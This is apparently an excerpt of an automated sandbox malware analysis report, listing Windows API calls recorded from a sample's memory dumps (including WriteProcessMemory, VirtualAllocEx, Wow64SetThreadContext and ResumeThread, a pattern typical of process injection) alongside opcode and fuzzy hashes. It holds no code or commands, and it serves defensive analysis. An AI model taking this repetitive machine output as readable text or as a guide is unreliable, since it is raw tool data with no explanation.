                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: 0f714bab2a61b405f646c0d57e70e503142034586eaf712a4c1c63ce14010601
                                                                                    • Instruction ID: cc07eb109529f3b53dc133d3aa5cb611f069248906a25c7aecb579834b5fd815
                                                                                    • Opcode Fuzzy Hash: 0f714bab2a61b405f646c0d57e70e503142034586eaf712a4c1c63ce14010601
                                                                                    • Instruction Fuzzy Hash: B9412CB4900309DFDB14CF95C449EAABBFAFF8C314F188559E519AB321D375A845CBA0
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01B059A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 7000e44dfeae2aeea9fb1c5df257ebc32c8e8ab7da5443b37b21d55f840b459d
                                                                                    • Instruction ID: fc835b270a0a95d8d8e6741b27348ce17293e3a0332b607f46a6e8990a3ccc01
                                                                                    • Opcode Fuzzy Hash: 7000e44dfeae2aeea9fb1c5df257ebc32c8e8ab7da5443b37b21d55f840b459d
                                                                                    • Instruction Fuzzy Hash: 8F41BF70C10719CFEB29DFA9C884B9DBBF5BF49304F20816AD408AB251DB756946CFA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2558294473-0
                                                                                    • Opcode ID: 9e8ef41a649227adbf2c1fe0184c098f776b9a0d1a82996343e8c8c1b2678333
                                                                                    • Instruction ID: d79f1220b33edf9f8f90f0b0c778747e5b62d783b9110d5a8a7cf16653e39537
                                                                                    • Opcode Fuzzy Hash: 9e8ef41a649227adbf2c1fe0184c098f776b9a0d1a82996343e8c8c1b2678333
                                                                                    • Instruction Fuzzy Hash: CA31B0B1900305CFEB15DFA6D9497AEBFF9FB48308F14C429D419A7240C7B89845CB61
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01B059A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 47ee2e1959c6fffcdf6b3e1d522d87a6a3d88415f62547fe2cf242b8d0903143
                                                                                    • Instruction ID: 969056404cad03efa88f2af324d870e3127442cde08a4ec3ad732c3ec34afaa5
                                                                                    • Opcode Fuzzy Hash: 47ee2e1959c6fffcdf6b3e1d522d87a6a3d88415f62547fe2cf242b8d0903143
                                                                                    • Instruction Fuzzy Hash: 1A41CF70C00719CFEB28CFA9C884BCDBBB5BF48304F24806AD418AB251DB756946CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    • Opcode ID: d7640f9a3ac38f02b51397c909493a2fb86cfa6ec5d250a84fc196ae4ce2ee25
                                                                                    • Instruction ID: 25ef2a72b918a82f98fc2b74c269f3d79b06e1c73bf5a5c3a0851786d7be6c70
                                                                                    • Opcode Fuzzy Hash: d7640f9a3ac38f02b51397c909493a2fb86cfa6ec5d250a84fc196ae4ce2ee25
                                                                                    • Instruction Fuzzy Hash: 1731BFB29043899FCB11CFA9C844ADEBFF8EF49310F14805AF954AB251C335A850DFA1
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,079D6FA7), ref: 079D7B1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: 95207d90bc94b7864f3a30d681d7131c95379552a6f17b2aaeb816bbc66790bb
                                                                                    • Instruction ID: fc5df14c2de1ae8ffd9faa965531edd9b265d2aaeec8a6707e614cb8bf74cd71
                                                                                    • Opcode Fuzzy Hash: 95207d90bc94b7864f3a30d681d7131c95379552a6f17b2aaeb816bbc66790bb
                                                                                    • Instruction Fuzzy Hash: 4F3146B5A14219CFDB14CFA9D844AEDBBF5BF88318F0484AAE415AB360C7389844CF64
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0C04512E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 3ac76c8ad5e20d98f12186786f66b36dded7dd03cc6daeb07d51bb8ba65a1e89
                                                                                    • Instruction ID: 6a23c77a73ab1cd11fbdd37f005127d0fcf3b68b9626fd625b9ba0293951808d
                                                                                    • Opcode Fuzzy Hash: 3ac76c8ad5e20d98f12186786f66b36dded7dd03cc6daeb07d51bb8ba65a1e89
                                                                                    • Instruction Fuzzy Hash: 5121CF72B002159BEB18DB69DC10BAEB7BAEFC4714F1481B4E50997395DB74EC11CB80
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CE8E35,?,?), ref: 07CE8EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: d45d0d9e6896e8cf0786e504f196fd24204a84b93e116de3b77908ce44129192
                                                                                    • Instruction ID: 3a46494d87b1a63fbc25605b73f1e764656e84cd7d68cd9cd93e6756b84d6ba8
                                                                                    • Opcode Fuzzy Hash: d45d0d9e6896e8cf0786e504f196fd24204a84b93e116de3b77908ce44129192
                                                                                    • Instruction Fuzzy Hash: 0031E4B5D013499FDB10CF9AD880A9EFBF9FB48314F14842AE915A7310D775A940CFA4
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CE8E35,?,?), ref: 07CE8EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: a0574791920468f39345be2e451348c527e2b56166af32561caadeb984318e10
                                                                                    • Instruction ID: 5e32f695d5f97b294c6a71fefc9cd6a1cb5c02e91f1589651a266dc710354d45
                                                                                    • Opcode Fuzzy Hash: a0574791920468f39345be2e451348c527e2b56166af32561caadeb984318e10
                                                                                    • Instruction Fuzzy Hash: 8231E3B5D0124A9FDB11CF9AD980ADEBBF5BB48310F14842AE418A7310D375A541CFA4
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0755CE10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: df0f255255026078914e2c2872ec9af23d4e01079562b6ce464a5679719ddb78
                                                                                    • Instruction ID: e8354c4ac823042052a562bc3606a1d5d0d636adb9c0e9796cb9d846a57e2833
                                                                                    • Opcode Fuzzy Hash: df0f255255026078914e2c2872ec9af23d4e01079562b6ce464a5679719ddb78
                                                                                    • Instruction Fuzzy Hash: C42124B2D003599FDB10CFAAC880BDEBBF5FF48310F10842AE919A7240C7799950DBA4
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Focus
                                                                                    • String ID:
                                                                                    • API String ID: 2734777837-0
                                                                                    • Opcode ID: f15b6bca38c50647a0e7918c38f4848bd191d4d845585b61a85866df92e7745f
                                                                                    • Instruction ID: a004a640fd8b5afd77d393e2c76c8b2669beb86a458404005bf26aad91b2c499
                                                                                    • Opcode Fuzzy Hash: f15b6bca38c50647a0e7918c38f4848bd191d4d845585b61a85866df92e7745f
                                                                                    • Instruction Fuzzy Hash: 14215AB5A012598FCB20DFA5D844BAEFBF4FB48714F244469E828A7740C735A841CBE1
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0C04C19A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: 8907c1d92adb54050f3a6dda6e4aa315db3b5a02510ec51cb50f022a0c1c5789
                                                                                    • Instruction ID: c068ee0898e032e04c14b0e53f1b2045a2dd3ba9918f5b0b95c6b4c7debbdc9e
                                                                                    • Opcode Fuzzy Hash: 8907c1d92adb54050f3a6dda6e4aa315db3b5a02510ec51cb50f022a0c1c5789
                                                                                    • Instruction Fuzzy Hash: DF2146B4900249CFDB10DFA9D884BDEBBF0FB88314F148529D419AB351D738A945CFA1
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B0D427
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 647b13d8ea945decbec49a4cc4f3d6a3aa86315594b659fbf8281f3295522329
                                                                                    • Instruction ID: 48d395c1483502ada44922d4aeb6830a7a5053551ce25fa31f8af3d302451c03
                                                                                    • Opcode Fuzzy Hash: 647b13d8ea945decbec49a4cc4f3d6a3aa86315594b659fbf8281f3295522329
                                                                                    • Instruction Fuzzy Hash: B921F2B5D00259AFDB11CFAAD884AEEBFF4EB48314F14805AE914A7350C378A940CFA5
                                                                                    APIs
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0C0448A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromMonitorPoint
                                                                                    • String ID:
                                                                                    • API String ID: 1566494148-0
                                                                                    • Opcode ID: 643a827be6938b9283e2d0ea8d8345fd7bc9d058a1466c98ca49a2c422339139
                                                                                    • Instruction ID: 137d8b697aaa38ea56bc557baa8e87510b7610f3bf6232b48cea2e472f97dd37
                                                                                    • Opcode Fuzzy Hash: 643a827be6938b9283e2d0ea8d8345fd7bc9d058a1466c98ca49a2c422339139
                                                                                    • Instruction Fuzzy Hash: 4B21BAB4E012499FCB10DF99C848BAEBBF4FB48314F10801AE855BB780C775A904CFA1
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 0C04323C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    • Opcode ID: a7137a81e21e06ead35340ec240fc6f1a717bac4b6bc93e31a24038356dd0910
                                                                                    • Instruction ID: 461ce71d0feb64a8b3bc76beea810aa1f96476353cd7a27ca56cd41977a5917a
                                                                                    • Opcode Fuzzy Hash: a7137a81e21e06ead35340ec240fc6f1a717bac4b6bc93e31a24038356dd0910
                                                                                    • Instruction Fuzzy Hash: C12125B19013499FDB10CF9AD984ADEFBF4BB48210F14842EE918A3250D378A504CB65
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0755CEF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 56046691c2ccfd6c0e0cbde4238910736ac2cdca3bcba0f0668e8cfb8bebb7a1
                                                                                    • Instruction ID: 93ae52e2cb34c51595f8a91b89e67d88a92aee7c14b720de487e15830a4798fb
                                                                                    • Opcode Fuzzy Hash: 56046691c2ccfd6c0e0cbde4238910736ac2cdca3bcba0f0668e8cfb8bebb7a1
                                                                                    • Instruction Fuzzy Hash: A121E5B1C003599FDB14DFAAC840ADEBBF5BF48310F10842AE959A7640C7799541DBA5
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0755CC66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 53ab06256bf86b0e6d861cdef19ad6e997a1c9ecc1a8795fcf9b7c90a0477701
                                                                                    • Instruction ID: 6ab2c48248226d2826e028477d2e11c492c0cfa8bee690077173250fdd0491fb
                                                                                    • Opcode Fuzzy Hash: 53ab06256bf86b0e6d861cdef19ad6e997a1c9ecc1a8795fcf9b7c90a0477701
                                                                                    • Instruction Fuzzy Hash: 852104B1D003099FDB14DFAAC485BEEBBF4AB48314F14842ED959A7240CB78A945CBA5
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B0D427
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 0C04323C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0C04C279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01B0B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0C04C279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    APIs
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0C0448A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromMonitorPoint
                                                                                    • String ID:
                                                                                    • API String ID: 1566494148-0
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 0C044259
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,079D6EEF,00000000,0435412C,033708D8,00000000,?), ref: 079D764D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0CCD4FAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 0C044259
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    APIs
                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07CE311A,?,?,?,?,?), ref: 07CE31BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0CCD4FAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0C04314A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,079D6E62,00000000,00000000,0435412C,033708D8), ref: 079D72B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,079D6EEF,00000000,0435412C,033708D8,00000000,?), ref: 079D764D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,079D6E62,00000000,00000000,0435412C,033708D8), ref: 079D72B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0C04314A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0755CD2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 079D20C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 058B1F95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1378638983-0
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,079D6FA7), ref: 079D7B1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01B0B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,079D6FA7), ref: 079D7B1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0C04DB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
